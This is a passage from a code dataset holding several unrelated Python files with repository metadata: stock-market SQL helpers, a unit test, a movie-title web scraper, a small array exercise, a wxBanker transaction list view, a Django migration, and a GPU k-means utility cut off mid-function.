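The update check in readGubenUpdateList above reduces to a left merge plus a tolerance test on the share totals (stored totals are converted from shares to units of 1e8 first). A self-contained sketch with hypothetical in-memory frames standing in for the two SQL queries:

.. code-block:: python

    import pandas as pd

    dfNew = pd.DataFrame({"ts_code": ["000001", "000002"], "totalsnew": [194.06, 110.0]})
    dfOld = pd.DataFrame({"ts_code": ["000001"], "totalsold": [194.06e8]})
    dfOld["totalsold"] = (dfOld["totalsold"] / 100000000).round(2)

    updateList = pd.merge(dfNew, dfOld, on="ts_code", how="left")
    updateList.fillna({"totalsold": 0}, inplace=True)
    updateList = updateList[abs(updateList.totalsnew - updateList.totalsold) > 0.1]
    print(list(updateList.ts_code))  # ['000002'] -- only the stock whose totals changed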
pd.read_excel('data/profits_inc_adf_linear.xlsx')\n stocks = stocks.round(2)\n # stocks = stocks[(stocks['mean'] >= 10) &\n # (stocks.sharp >= 0.8) &\n # (stocks.pe_ttm <= 30)]\n stocks = stocks[(stocks['r2'] >= 0.3) & (stocks['coef'] > 0)]\n stocks.sort_values('sharp', ascending=False, inplace=True)\n return stocks\n\n\ndef readIndexKline(index_code, days):\n \"\"\"\n 读取指数K线数据\n :param index_code: str, 9位指数代码\n :param days: int, 读取的天数\n :return: Dataframe\n indexDf = pd.DataFrame({'date': dateList,\n 'open': openList,\n 'close': closeList,\n 'high': highList,\n 'low': lowList,\n 'pe': peList})\n \"\"\"\n peTable = 'index_pe' if index_code == '000010.SH' else 'index_dailybasic'\n sql = (f'select a.trade_date, a.open, a.high, a.low, a.close, b.pe_ttm '\n f' from index_daily a, {peTable} b '\n f' where a.ts_code=\"{index_code}\" and a.ts_code=b.ts_code '\n f' and a.trade_date=b.trade_date'\n f' order by trade_date desc limit {days};')\n df = _readKline(sql)\n # df = pd.read_sql(sql, engine)\n # df.rename(columns={'pe_ttm': 'pe'}, inplace=True)\n # df['date'] = df.trade_date.apply(lambda x: x.strftime('%Y%m%d'))\n # df.sort_values(by='date', inplace=True)\n # df.set_index(keys='date', inplace=True)\n # df.reset_index(inplace=True)\n # df.sort_values(by='trade_date', inplace=True)\n return df\n\n\ndef _readKline(sql):\n df = pd.read_sql(sql, engine)\n df.rename(columns={'trade_date': 'date', 'pe_ttm': 'pe'}, inplace=True)\n df.date = pd.to_datetime(df.date)\n df = df.set_index('date')\n df = df.sort_index()\n df = df.reset_index()\n return df\n # result = engine.execute(sql).fetchall()\n # stockDatas = [i for i in reversed(result)]\n # # klineDatas = []\n # dateList = []\n # openList = []\n # closeList = []\n # highList = []\n # lowList = []\n # peList = []\n # indexes = list(range(len(result)))\n # for i in indexes:\n # date, _open, high, low, close, ttmpe = stockDatas[i]\n # dateList.append(date.strftime(\"%Y-%m-%d\"))\n # # QuarterList.append(date)\n # openList.append(_open)\n # closeList.append(close)\n # highList.append(high)\n # lowList.append(low)\n # peList.append(ttmpe)\n # klineDf = pd.DataFrame({'date': dateList,\n # 'open': openList,\n # 'close': closeList,\n # 'high': highList,\n # 'low': lowList,\n # 'pe': peList})\n # return klineDf\n\n\nif __name__ == '__main__':\n initlog()\n pass\n # hylist = getHYList()\n # print(readCurrentTTMPE('002508'))\n\n # 测试updateKlineEXTData\n ts_code = '000651'\n startDate = '2016-01-01'\n # updateKlineEXTData(ts_code, startDate)\n\n\ndef readTableFields(table):\n sql = (f'select column_name from information_schema.columns'\n f' where table_name=\"{table}\"')\n result = engine.execute(sql).fetchall()\n return ','.join([s[0] for s in result])","repo_name":"who8736/stockdatamanage","sub_path":"sqlrw.py","file_name":"sqlrw.py","file_ext":"py","file_size_in_byte":38921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"41480482161","text":"from random import randint\nfrom unittest import TestCase\n\nfrom dominio.entidades import Competencia\nfrom dominio.enums import NivelDeCompetenciaEnum\nfrom dominio.objetos_de_valor import Id\nfrom testes.fabricas import FabricaTesteId\n\n\nclass TestCompetencia(TestCase):\n def test_construir_QUANDO_atributos_informados_ENTAO_retorna_competencia(self) -> None:\n docente_id = FabricaTesteId.build()\n disciplina_id = FabricaTesteId.build()\n nivel = 2\n\n competencia = Competencia.construir(\n docente_id=docente_id,\n disciplina_id=disciplina_id,\n 
nivel=nivel\n        )\n\n        esperado = Competencia(\n            docente_id=Id(docente_id),\n            disciplina_id=Id(disciplina_id),\n            nivel=NivelDeCompetenciaEnum.DOIS\n        )\n        self.assertEqual(competencia, esperado)\n","repo_name":"fr-mm/competencias-backend","sub_path":"testes/unitarios/dominio/entidades/test_competencia.py","file_name":"test_competencia.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"17704874054","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\nresponse = requests.get(url=\"http://web.archive.org/web/20200518055830/https://www.empireonline.com/movies/features/best-movies-2/\")\r\nwebsite_html = response.text\r\n\r\nsoup = BeautifulSoup(website_html, \"html.parser\")\r\nall_movie = (soup.find_all(name=\"h3\", class_=\"title\"))\r\nprint(all_movie)\r\nmovie_titles = [movie.getText() for movie in all_movie]\r\nmovie_titles.reverse()\r\nprint(movie_titles)\r\n\r\nwith open(\"movies.txt\", mode=\"w\") as file:\r\n    for movie in movie_titles:\r\n        data = file.write(f\"{movie}\\n\")\r\n\r\n\r\n","repo_name":"AnubhavRathore/Top-100-Movies","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"26428277812","text":"\"\"\"\n\nIn the second array, store the indices of the even elements of the first array. For example, given an array with the values\n8, 3, 15, 6, 4, 2, the second array should be filled with the values 0, 3, 4, 5 (indexing starts at zero), since\nthose are exactly the positions of the first array that hold even numbers.\n\n\"\"\"\nimport random\n\nSIZE = 10\nMIN_ITEM = 0\nMAX_ITEM = 100\nlist_numbers = [random.randint(MIN_ITEM, MAX_ITEM) for _ in range(SIZE)] #[_ for _ in range(10)] - for testing\nprint(f'Source array:\\n {list_numbers}')\n\nnew_list = []\n\nfor idx, item in enumerate(list_numbers):\n    if item % 2 == 0:\n        new_list.append(idx)\nprint(f'Resulting array, whose elements are the positions of the even elements of the source array:\\n {new_list}')\n","repo_name":"SergeyDuvanskiy/AlgorithmsInPython","sub_path":"Lesson_3/task_2.py","file_name":"task_2.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"3536299863","text":"import threading\nimport wx, datetime\nfrom wxbanker.lib.pubsub import Publisher\nfrom wxbanker.ObjectListView import GroupListView, ColumnDefn, CellEditorRegistry\nfrom wxbanker import bankcontrols, tagtransactiondialog\n\nfrom wxbanker.currencies import GetCurrencyInt\n\nclass TransactionOLV(GroupListView):\n    EMPTY_MSG_NORMAL = _(\"No transactions entered.\")\n    EMPTY_MSG_SEARCH = _(\"No matching transactions.\")\n    \n    def __init__(self, parent, bankController):\n        GroupListView.__init__(self, parent, style=wx.LC_REPORT|wx.SUNKEN_BORDER, name=\"TransactionOLV\")\n        self.LastSearch = None\n        self.CurrentAccount = None\n        self.BankController = bankController\n\n        self.showGroups = False\n        #WXTODO: figure out these (and the text color, or is that already?) 
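The index-collecting loop in the task above can also be written as a single comprehension; the example uses the same hypothetical values as the docstring:

.. code-block:: python

    list_numbers = [8, 3, 15, 6, 4, 2]
    even_indices = [idx for idx, item in enumerate(list_numbers) if item % 2 == 0]
    print(even_indices)  # [0, 3, 4, 5]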
from theme (LP: ???)\n self.evenRowsBackColor = wx.Colour(224,238,238)\n self.oddRowsBackColor = wx.WHITE\n\n self.cellEditMode = GroupListView.CELLEDIT_DOUBLECLICK\n self.SetEmptyListMsg(self.EMPTY_MSG_NORMAL)\n\n # Calculate the necessary width for the date column.\n dateStr = str(datetime.date.today())\n dateWidth = self.GetTextExtent(dateStr)[0] + 10\n\n # Define some constants to use throughout.\n self.COL_DATE = 0\n self.COL_DESCRIPTION = 1\n self.COL_AMOUNT = 2\n self.COL_TOTAL = 3\n\n # If you change these column names, update sizeAmounts()!\n self.SetColumns([\n ColumnDefn(_(\"Date\"), valueGetter=self.getDateAndIDOf, valueSetter=self.setDateOf, stringConverter=self.renderDateIDTuple, editFormatter=self.renderEditDate, width=dateWidth),\n ColumnDefn(_(\"Description\"), valueGetter=\"Description\", isSpaceFilling=True, editFormatter=self.renderEditDescription),\n ColumnDefn(_(\"Amount\"), \"right\", valueGetter=self.getAmount, valueSetter=self.setAmount, stringConverter=self.renderFloat, editFormatter=self.renderEditFloat),\n ColumnDefn(_(\"Balance\"), \"right\", valueGetter=self.getTotal, stringConverter=self.renderFloat, isEditable=False),\n ])\n # Our custom hack in OLV.py:2017 will render amount floats appropriately as %.2f when editing.\n\n # By default, sort by the date column, ascending.\n self.SORT_COL = self.COL_DATE\n self.SortBy(self.SORT_COL)\n \n self.Bind(wx.EVT_RIGHT_DOWN, self.onRightDown)\n\n self.Subscriptions = (\n (self.onSearch, \"SEARCH.INITIATED\"),\n (self.onSearchCancelled, \"SEARCH.CANCELLED\"),\n (self.onSearchMoreToggled, \"SEARCH.MORETOGGLED\"),\n (self.onTransactionAdded, \"transaction.created\"),\n (self.onTransactionsRemoved, \"transactions.removed\"),\n (self.onCurrencyChanged, \"currency_changed\"),\n (self.onShowCurrencyNickToggled, \"controller.show_currency_nick_toggled\"),\n (self.updateTotals, \"ormobject.updated.Transaction.Amount\"),\n (self.onTransactionDateUpdated, \"ormobject.updated.Transaction.Date\"),\n )\n\n for callback, topic in self.Subscriptions:\n Publisher.subscribe(callback, topic)\n \n def SetObjects(self, objs, *args, **kwargs):\n \"\"\"\n Override the default SetObjects to properly refresh the auto-size,\n and clear out any cached Totals as they may not be valid IE when we\n search and have a subset of transactions.\n \"\"\"\n # Remove any previously cached totals, to fix search totals.\n GroupListView.SetObjects(self, objs, *args, **kwargs)\n self.updateTotals()\n\n # Force a re-size here, in the case that the vscrollbar-needed state\n # changed by this set account, to size correctly.\n wx.CallLater(50, self._ResizeSpaceFillingColumns)\n \n def IsSearchActive(self):\n return self.GrandParent.searchActive\n \n def SetSearchActive(self, value):\n self.GrandParent.searchActive = value\n \n def onTransactionDateUpdated(self, message):\n transaction = message.data\n self.RefreshObject(transaction)\n self.SortBy(self.SORT_COL)\n self.updateTotals()\n\n def getDateAndIDOf(self, transaction):\n # A date and ID two-tuple is used to allow for correct sorting\n # by date (bug #653697)\n return (transaction.Date, transaction.ID)\n\n def setDateOf(self, transaction, date):\n transaction.Date = date\n self.Freeze()\n self.SortBy(self.SORT_COL)\n self.Thaw()\n \n def setAmount(self, transaction, amount):\n transaction.Amount = amount\n self.Freeze()\n self.SortBy(self.SORT_COL)\n self.Thaw()\n\n def getTotal(self, transObj):\n if not hasattr(transObj, \"_Total\"):\n self.updateTotals()\n \n return transObj._Total\n \n def 
updateTotals(self, message=None):\n first = self.GetObjectAt(0)\n if first is None:\n return\n \n if not self.CurrentAccount:\n #This means we are in 'All accounts' so we need to convert each total\n # to the global currency\n balance_currency = self.BankController.Model.GlobalCurrency\n else:\n #we are just viewing a single account\n # balance currency = accounts currency\n balance_currency = GetCurrencyInt(self.CurrentAccount.GetCurrency())\n \n first._Total = first.GetAmount(balance_currency)\n \n b = first\n for i in range(1, len(self.GetObjects())):\n a, b = b, self.GetObjectAt(i)\n b._Total = a._Total + b.GetAmount(balance_currency)\n \n def renderDateIDTuple(self, pair):\n return str(pair[0])\n \n def getAmount(self, obj):\n #Return the whole transaction/float since we need to use its\n #renderAmount method to support multiple currencies.\n return obj \n \n def renderFloat(self, value):\n if isinstance(value, float):\n #this is a 'balance' column, its ok to use the bank model's float2str\n # as long as we'r not in an account.\n if self.CurrentAccount:\n return self.CurrentAccount.float2str(value)\n else:\n return self.BankController.Model.float2str(value)\n else:\n #this is a trnasaction, so it belogns to the 'Amount' column, render\n # it with its appropieate currency\n return value.RenderAmount()\n \n def renderEditDate(self, transaction):\n return str(transaction.Date)\n \n def renderEditFloat(self, modelObj):\n return \"%.2f\" % modelObj.Amount\n \n def renderEditDescription(self, modelObj):\n return modelObj._Description\n\n def _sizeAmounts(self):\n \"\"\"Set the width of the Amount and Total columns based on the approximated widest value.\"\"\"\n transactions = self.GetObjects()\n # If there aren't any transactions, there's nothing to do.\n if len(transactions) == 0:\n return\n\n for i, attr in enumerate((\"Amount\", \"_Total\")):\n # Sort by amount, then compare the highest and lowest, to take into account a negative sign.\n sortedtrans = list(sorted(transactions, cmp=lambda a,b: cmp(getattr(a, attr), getattr(b, attr))))\n high, low = sortedtrans[0], sortedtrans[-1]\n # Get the (translated) displayed column name to calculate width.\n header = _({\"_Total\": \"Balance\"}.get(attr, attr))\n # Take the max of the two as well as the column header width, as we need to at least display that.\n widestWidth = max([self.GetTextExtent(header)[0]] + [self.GetTextExtent(self.renderFloat(getattr(t, attr)))[0] for t in (high, low)])\n wx.CallAfter(self.SetColumnFixedWidth, *(self.COL_AMOUNT+i, widestWidth + 10))\n\n def sizeAmounts(self):\n threading.Thread(target=self._sizeAmounts).start()\n\n def setAccount(self, account, scrollToBottom=True):\n self.CurrentAccount = account\n\n if account is None:\n # None represents the \"All accounts\" option, so we want all transactions.\n transactions = self.BankController.Model.GetTransactions()\n else:\n transactions = account.Transactions\n\n self.SetObjects(transactions)\n # Update the width of the amount/total columns.\n self.sizeAmounts()\n # Unselect everything.\n self.SelectObjects([], deselectOthers=True)\n if scrollToBottom:\n self.ensureVisible(-1)\n \n if self.IsSearchActive():\n self.doSearch(self.LastSearch)\n\n def ensureVisible(self, index):\n length = self.GetItemCount()\n # If there are no items, ensure a no-op (LP: #338697)\n if length:\n if index < 0:\n index = length + index\n self.EnsureCellVisible(index, 0)\n\n def onRightDown(self, event):\n itemID, flag, col = self.HitTestSubItem(event.Position)\n\n # Don't do anything for 
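updateTotals above is a single running-sum pass: each row caches a _Total equal to the previous row's total plus its own (currency-converted) amount. A plain-Python sketch of that pass with hypothetical amounts:

.. code-block:: python

    amounts = [100.0, -25.5, 10.0]
    totals, running = [], 0.0
    for amount in amounts:
        running += amount
        totals.append(running)
    print(totals)  # [100.0, 74.5, 84.5]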
right-clicks not on items.\n if itemID != -1:\n if not self.GetItemState(itemID, wx.LIST_STATE_SELECTED):\n self._SelectAndFocus(itemID)\n transactions = self.GetSelectedObjects()\n self.showContextMenu(transactions, col)\n\n def showContextMenu(self, transactions, col, removeOnly=False):\n # This seems unlikely but let's defend against it.\n if not transactions:\n return\n \n menu = wx.Menu()\n \n # removeOnly means only show the remove entry, such as from the CSV import frame.\n if not removeOnly:\n # If the right-click was on the total column, use the total, otherwise the amount.\n if col == self.COL_TOTAL:\n # Use the last total if multiple are selected.\n amount = transactions[-1]._Total\n else:\n amount = sum((t.Amount for t in transactions))\n \n val = self.BankController.Model.float2str(amount)\n\n actions = [\n (_(\"Send %s to calculator\") % val, \"wxART_calculator_edit\"),\n (_(\"Add %s to calculator\") % val, \"wxART_calculator_add\"),\n (_(\"Subtract %s from calculator\") % val, \"wxART_calculator_delete\"),\n ]\n\n for i, (actionStr, artHint) in enumerate(actions):\n item = wx.MenuItem(menu, -1, actionStr)\n item.SetBitmap(wx.ArtProvider.GetBitmap(artHint))\n menu.Bind(wx.EVT_MENU, lambda e, i=i: self.onCalculatorAction(transactions, col, i), source=item)\n menu.AppendItem(item)\n menu.AppendSeparator()\n\n # Always show the Remove context entry.\n if len(transactions) == 1:\n removeStr = _(\"Remove this transaction\")\n moveStr = _(\"Move this transaction to account\")\n tagStr = _(\"No tags yet\")\n else:\n removeStr = _(\"Remove these %i transactions\") % len(transactions)\n moveStr = _(\"Move these %i transactions to account\") % len(transactions)\n tagStr = _(\"No common tags yet\")\n \n addTagStr = _(\"Add a tag\")\n\n removeItem = wx.MenuItem(menu, -1, removeStr)\n menu.Bind(wx.EVT_MENU, lambda e: self.onRemoveTransactions(transactions), source=removeItem)\n removeItem.SetBitmap(wx.ArtProvider.GetBitmap('wxART_delete'))\n menu.AppendItem(removeItem)\n\n if not removeOnly:\n # Create the sub-menu of sibling accounts to the move to.\n moveToAccountItem = wx.MenuItem(menu, -1, moveStr)\n accountsMenu = wx.Menu()\n if self.CurrentAccount is None:\n siblings = []\n else:\n siblings = self.CurrentAccount.GetSiblings()\n for account in siblings:\n accountItem = wx.MenuItem(menu, -1, account.GetName())\n accountsMenu.AppendItem(accountItem)\n accountsMenu.Bind(wx.EVT_MENU, lambda e, account=account: self.onMoveTransactions(transactions, account), source=accountItem)\n moveToAccountItem.SetSubMenu(accountsMenu)\n moveMenuItem = menu.AppendItem(moveToAccountItem)\n \n # The tag menu.\n tagsItem = wx.MenuItem(menu, -1, _(\"Tags\"))\n tagsMenu = wx.Menu()\n\n ## The initial tags are the ones in the first transaction. 
If there are more, intersect across them.\n commonTags = set(transactions[0].Tags)\n for transaction in transactions[1:]:\n commonTags = commonTags.intersection(transaction.Tags)\n \n ## If we have any common tags, add them to the menu, otherwise the no tags item.\n if commonTags:\n for tag in commonTags:\n tagItem = wx.MenuItem(tagsMenu, -1, tag.Name)\n tagItemMenu = wx.Menu()\n searchItem = tagItemMenu.Append(-1, _(\"Search for this tag\"))\n removeItem = tagItemMenu.Append(-1, _(\"Remove this tag\"))\n tagItem.SetSubMenu(tagItemMenu)\n tagsMenu.AppendItem(tagItem)\n \n tagItemMenu.Bind(wx.EVT_MENU, lambda e, tag=tag: self.onTagSearch(tag), source=searchItem)\n tagItemMenu.Bind(wx.EVT_MENU, lambda e, tag=tag: self.onTagRemoval(tag, transactions), source=removeItem)\n else:\n noTagsItem = tagsMenu.Append(-1, tagStr)\n tagsMenu.Enable(noTagsItem.Id, False)\n tagsMenu.AppendSeparator()\n addItem = tagsMenu.Append(-1, addTagStr)\n tagsItem.SetSubMenu(tagsMenu)\n tagsMenu.Bind(wx.EVT_MENU, lambda e: self.onTagTransactions(transactions), source=addItem)\n \n ## Append it at the bottom after a separator.\n menu.AppendSeparator()\n menu.AppendItem(tagsItem)\n \n # If there are no siblings, disable the item, but leave it there for consistency.\n if not siblings:\n menu.Enable(moveMenuItem.Id, False)\n\n # Show the menu and then destroy it afterwards.\n self.PopupMenu(menu)\n menu.Destroy()\n\n def onCalculatorAction(self, transactions, col, i):\n \"\"\"\n Given an action to perform on the calculator, and the row and col,\n generate the string of characters necessary to perform that action\n in the calculator, and push them.\n \"\"\"\n if col == self.COL_TOTAL:\n # Use the last total if multiple are selected.\n amount = transactions[-1]._Total\n else:\n amount = sum((t.Amount for t in transactions))\n\n pushStr = ('C%s', '+%s=', '-%s=')[i] # Send, Add, Subtract commands\n pushStr %= amount\n\n Publisher.sendMessage(\"CALCULATOR.PUSH_CHARS\", pushStr)\n\n def onRemoveTransactions(self, transactions):\n \"\"\"Remove the transactions from the account.\"\"\"\n if self.CurrentAccount:\n self.CurrentAccount.RemoveTransactions(transactions)\n # We won't have a CurrentAccount when viewing all accounts (LP: #620924)\n else:\n for transaction in transactions:\n transaction.Parent.RemoveTransaction(transaction)\n\n def onMoveTransactions(self, transactions, targetAccount):\n \"\"\"Move the transactions to the target account.\"\"\"\n self.CurrentAccount.MoveTransactions(transactions, targetAccount)\n\n def frozenResize(self):\n self.Parent.Layout()\n self.Parent.Thaw()\n\n def onTransactionsRemoved(self, message):\n account, transactions = message.data\n if account is self.CurrentAccount:\n # Remove the item from the list.\n self.RemoveObjects(transactions)\n self.updateTotals()\n self.sizeAmounts()\n \n def onTransactionAdded(self, message):\n account, transaction = message.data\n if account is self.CurrentAccount:\n self.AddObject(transaction)\n self.updateTotals()\n self.Reveal(transaction)\n self.sizeAmounts()\n\n def onTagSearch(self, tag):\n Publisher.sendMessage(\"SEARCH.EXTERNAL\", str(tag))\n \n def onTagRemoval(self, tag, transactions):\n for transaction in transactions:\n transaction.RemoveTag(tag)\n # The removal won't appear unless we refresh the affected transactions.\n self.RefreshObjects(transactions)\n \n def onTagTransactions(self, transactions):\n dlg = tagtransactiondialog.TagTransactionsDialog(self, transactions)\n dlg.ShowModal()\n # Unconditionally refresh, since hitting enter in the 
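The calculator integration in onCalculatorAction above is plain string templating over a pubsub channel: 'C<amount>' clears and sends, '+<amount>=' adds, '-<amount>=' subtracts. A quick illustration with a hypothetical amount:

.. code-block:: python

    templates = ('C%s', '+%s=', '-%s=')  # Send, Add, Subtract
    amount = 42.5
    print([t % amount for t in templates])  # ['C42.5', '+42.5=', '-42.5=']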
tag field requires a refresh but doesn't provide a useful result.\n self.RefreshObjects(transactions)\n \n def onSearch(self, message):\n self.SetEmptyListMsg(self.EMPTY_MSG_SEARCH)\n self.LastSearch = message.data\n self.doSearch(self.LastSearch)\n \n def doSearch(self, searchData):\n searchString, match = searchData\n account = self.CurrentAccount\n matches = self.BankController.Model.Search(searchString, account=account, matchIndex=match)\n self.SetObjects(matches)\n self.SetSearchActive(True)\n\n def onSearchCancelled(self, message):\n # Ignore cancels on an inactive search to avoid silly refreshes.\n if self.IsSearchActive():\n self.SetSearchActive(False)\n self.setAccount(self.CurrentAccount)\n self.SetEmptyListMsg(self.EMPTY_MSG_NORMAL)\n\n def onSearchMoreToggled(self, message):\n # Perhaps necessary to not glitch overlap on Windows?\n self.Refresh()\n\n def onCurrencyChanged(self, message):\n # Refresh all the transaction objects, re-rendering the amounts.\n self.RefreshObjects()\n # The current likely changed the widths of the amount/total column.\n self.sizeAmounts()\n # Now we need to adjust the description width so we don't have a horizontal scrollbar.\n self.AutoSizeColumns()\n \n def onShowCurrencyNickToggled(self, message):\n # Refresh all the transaction objects, re-rendering the amounts.\n self.RefreshObjects()\n # The current likely changed the widths of the amount/total column.\n self.sizeAmounts()\n # Now we need to adjust the description width so we don't have a horizontal scrollbar.\n self.AutoSizeColumns()\n \n def __del__(self):\n for callback, topic in self.Subscriptions:\n Publisher.unsubscribe(callback)\n","repo_name":"mrooney/wxbanker","sub_path":"wxbanker/transactionolv.py","file_name":"transactionolv.py","file_ext":"py","file_size_in_byte":18575,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"61"} +{"seq_id":"44071681151","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('contacts', '0023_properties_display_on_list'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='contact',\n name='company',\n field=models.ForeignKey(verbose_name='société', to='contacts.Company', null=True, blank=True, related_name='contacts'),\n ),\n ]\n","repo_name":"vegaelle/pyru","sub_path":"contacts/migrations/0024_auto_20151020_1632.py","file_name":"0024_auto_20151020_1632.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70702985474","text":"r\"\"\"Module of utility functionalities used in different parts of the\npackage.\n\nAuthor: Jonas C. 
Ditz\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport torch\nimport torch.nn.functional as F\nfrom scipy import stats\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import (\n accuracy_score,\n average_precision_score,\n f1_score,\n log_loss,\n matthews_corrcoef,\n precision_recall_curve,\n roc_auc_score,\n)\n\n\ndef _init_kmeans(\n x: torch.Tensor,\n n_clusters: int,\n n_local_trials: int = None,\n use_cuda: bool = False,\n distance: str = \"euclidean\",\n):\n r\"\"\"Initialization method for K-Means (k-Means++)\n\n Parameters\n ----------\n x : Tensor\n Data that will be used for clustering provided as a tensor of shape\n (n_samples x n_dimensions).\n n_clusters : int\n Number of clusters that will be computed.\n n_local_trials : int\n Number of local seeding trails. Defaults to None.\n use_cuda : bool\n Flag that determines whether computations should be performed on the GPU.\n Defaults to False.\n distance : str\n Distance measure used for clustering. Defaults to 'euclidean'.\n \n Returns\n -------\n clusters : Tensor\n Initial centers for each cluster.\n \"\"\"\n n_samples, n_features = x.size()\n\n # initialize tensor that will hold the cluster centers and send it to GPU if needed\n clusters = torch.Tensor(n_clusters, n_features)\n if use_cuda:\n clusters = clusters.cuda()\n\n # Set the number of local seeding trials if none is given\n if n_local_trials is None:\n n_local_trials = 2 + int(np.log(n_clusters))\n\n # pick first cluster center randomly\n clusters[0] = x[np.random.randint(n_samples)]\n\n # initialize list of distances to the selected centroid and calculate current potential\n if distance == \"cosine\":\n # calculate distance of each point to the selected centroid using the distance measure of the spherical k-Means\n closest_dist_sq = 1 - clusters[[0]].mm(x.t())\n closest_dist_sq = closest_dist_sq.view(-1)\n elif distance == \"euclidean\":\n # calculate distance of each point to the selected centroid using the Euclidean distance measure\n closest_dist_sq = torch.cdist(clusters[[0]], x, p=2)\n closest_dist_sq = closest_dist_sq.view(-1)\n else:\n raise ValueError(\"Unknown value for parameter mode: {}\".format(distance))\n current_pot = closest_dist_sq.sum().item()\n\n # pick the remaining n_clusters-1 cluster centers\n for c in range(1, n_clusters):\n # Choose center candidates by sampling with probability proportional to the squared distance to the closest\n # existing center\n rand_vals = np.random.random_sample(n_local_trials) * current_pot\n candidate_ids = np.searchsorted(closest_dist_sq.cumsum(-1).cpu(), rand_vals)\n\n # calculate distance of each data point to the candidates\n if distance == \"cosine\":\n distance_to_candidates = 1 - x[candidate_ids].mm(x.t())\n elif distance == \"euclidean\":\n distance_to_candidates = torch.cdist(x[candidate_ids], x, p=2)\n else:\n raise ValueError(\"Unknown value for parameter mode: {}\".format(distance))\n\n # iterate over the candidates for the new cluster center and select the most suitable\n best_candidate = None\n best_pot = None\n best_dist_sq = None\n for trial in range(n_local_trials):\n # Compute potential when including center candidate\n new_dist_sq = torch.min(closest_dist_sq, distance_to_candidates[trial])\n new_pot = new_dist_sq.sum().item()\n\n # Store result if it is the best local trial so far\n if (best_candidate is None) or (new_pot < best_pot):\n best_candidate = candidate_ids[trial]\n best_pot = new_pot\n best_dist_sq = new_dist_sq\n\n clusters[c] = x[best_candidate]\n current_pot = 
best_pot\n        closest_dist_sq = best_dist_sq\n\n    return clusters\n\n\ndef kmeans_gpu(\n    x: torch.Tensor,\n    n_clusters: int,\n    distance: str = \"euclidean\",\n    max_iters: int = 100,\n    verbose: bool = True,\n    init: str = None,\n    tol: float = 1e-4,\n):\n    r\"\"\"Performing k-Means clustering (Lloyd's algorithm) with Tensors utilizing GPU resources.\n\n    Parameters\n    ----------\n    x : Tensor\n        Data that will be used for clustering provided as a tensor of shape\n        (n_samples x n_dimensions).\n    n_clusters : int\n        Number of clusters that will be computed.\n    distance : str\n        Distance measure used for clustering. Defaults to 'euclidean'.\n    max_iters : int\n        Maximal number of iterations used in the K-Means clustering. Defaults to 100.\n    verbose : bool\n        Flag to activate verbose output. Defaults to True.\n    init : str\n        Initialization process for the K-Means algorithm. Defaults to None.\n    tol : float\n        Relative tolerance with regards to Frobenius norm of the difference in the cluster\n        centers of two consecutive iterations to declare convergence. It's not advised to set\n        `tol=0` since convergence might never be declared due to rounding errors. Use a very\n        small number instead. Defaults to 1e-4.\n\n    Returns\n    -------\n    clusters : Tensor\n        Tensor that contains the cluster centers, i.e. result of the K-Means algorithm. The shape of\n        the tensor is (n_clusters x n_dimensions).\n    \"\"\"\n    # make sure there are more samples than requested clusters\n    if x.shape[0] < n_clusters:\n        raise ValueError(\n            f\"n_samples={x.shape[0]} should be >= n_clusters={n_clusters}.\"\n        )\n\n    # check whether the input tensor is on the GPU\n    use_cuda = x.is_cuda\n\n    # store number of data points and dimensionality of each data point\n    n_samples, n_features = x.size()\n\n    # determine initialization procedure for this run of the k-Means algorithm\n    if init == \"k-means++\":\n        print(\" Initialization method for k-Means: k-Means++\")\n        clusters = _init_kmeans(x, n_clusters, use_cuda=use_cuda, distance=distance)\n    elif init is None:\n        print(\" Initialization method for k-Means: random\")\n        indices = torch.randperm(n_samples)[:n_clusters]\n        if use_cuda:\n            indices = indices.cuda()\n        clusters = x[indices]\n    else:\n        raise ValueError(\"Unknown initialization procedure: {}\".format(init))\n\n    # perform Lloyd's algorithm iteratively until convergence or the number of iterations exceeds max_iters\n    prev_sim = np.inf\n    for n_iter in range(max_iters):\n        # calculate the distance of data points to clusters using the selected distance measure. 
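A compact NumPy rendering of the D^2-sampling idea behind _init_kmeans above (the local-trials refinement is dropped for brevity); the data, seed count, and function name are hypothetical:

.. code-block:: python

    import numpy as np

    def dsq_seed(x, k, rng):
        centers = [x[rng.integers(len(x))]]
        for _ in range(k - 1):
            # squared distance of every point to its nearest chosen center
            d2 = np.min([((x - c) ** 2).sum(axis=1) for c in centers], axis=0)
            # far-away points are proportionally more likely to seed the next center
            centers.append(x[rng.choice(len(x), p=d2 / d2.sum())])
        return np.stack(centers)

    rng = np.random.default_rng(0)
    print(dsq_seed(rng.normal(size=(100, 2)), 3, rng).shape)  # (3, 2)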
Use the calculated\n        # distances to assign each data point to a cluster\n        if distance == \"cosine\":\n            sim = x.mm(clusters.t())\n            tmp, assign = sim.max(dim=-1)\n        elif distance == \"euclidean\":\n            sim = torch.cdist(x, clusters, p=2)\n            tmp, assign = sim.min(dim=-1)\n        else:\n            raise ValueError(\"Unknown distance measure: {}\".format(distance))\n\n        # get the mean distance to the cluster centers\n        sim_mean = tmp.mean()\n        if (n_iter + 1) % 10 == 0 and verbose:\n            print(\n                \" k-Means iter: {}, distance: {}, objective value: {}\".format(\n                    n_iter + 1, distance, sim_mean\n                )\n            )\n\n        # update clusters\n        for j in range(n_clusters):\n            # get all data points that were assigned to the current cluster\n            index = assign == j\n\n            # if no data point was assigned to the current cluster, use the data point furthest away from every cluster\n            # as new cluster center\n            if index.sum() == 0:\n                if distance == \"cosine\":\n                    idx = tmp.argmin()\n                elif distance == \"euclidean\":\n                    idx = tmp.argmax()\n                clusters[j] = 